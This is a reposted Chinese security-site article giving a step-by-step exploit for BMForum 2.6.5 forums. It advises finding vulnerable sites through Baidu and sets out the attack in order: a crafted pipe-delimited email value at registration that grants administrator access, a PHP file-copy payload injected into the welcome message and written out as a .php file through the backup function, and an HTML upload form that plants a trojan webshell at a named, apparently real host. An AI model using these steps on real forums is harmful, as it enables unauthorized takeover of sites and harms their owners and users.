| 网站首页 | 新闻中心 | 系统安全 | 网络安全 | 安全技术 | 下载中心 | 
课件制作网.
收藏本站
设为首页
安全365
BMForum 2.65漏洞
BMForum 2.65漏洞
作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-25 10:52:37

受影响版本:

BMForum Plus! 2.6.5 贺岁版
BMForum Datium! 2.6.5 贺岁版

在baidu中搜以上版本,随便选一个,进入注册用户页面:

利用注册选项过滤不完整攻击

mail选项填写格式:

test@test.com|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|

注册一用户eztest,密码:eztest,mail格式如上

登陆,点管理中心,用上面的用户和密码可以进入管理后台界面。

管理页面:adminindex.php

注册欢迎段信息的正文处输入;

';copy($_FILES[mf][tmp_name],$_FILES[mf][name])?>

论坛备份:

选择备份欢迎信息文件,其它都去掉

指定备份目录为:


备份路径:

face/222 other目录是必须的。

完整路径:

http://saiy.77yan.com/wrsky/face/222/other/welcome.php

phpcl.htm

<form ENCTYPE="multipart/form-data" action="http://saiy.77yan.com/wrsky/face/222/other/welcome.php"; method="POST">
<input name="mf" type="file">
<input value="send" type="submit">
</form>

上传马2005.php,马的路径就是:

http://saiy.77yan.com/wrsky/face/222/other/2005.php

【转自世纪安全网 http://www.21safe.com】
新闻录入:admin    责任编辑:admin 
  • 上一篇新闻:

  • 下一篇新闻:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
     
     
     
    研究发现Firefox存在大量
    研究发现Firefox存在大量
    Sisfo Kampus文件包含及
    IBM Tivoli Storage Man
    IBM WebSphere Host On-
    Microsoft Windows Medi
    IBM DB2多个拒绝服务漏洞
    IBM Lotus Domino多个Tu
    Mozilla Firefox/SeaMon
    Texinfo文件处理溢出漏洞

    Copyright © 2006-2008 www.anquan365.com 安全365
    建议使用1024*768分辨率及第三方浏览器对本站进行浏览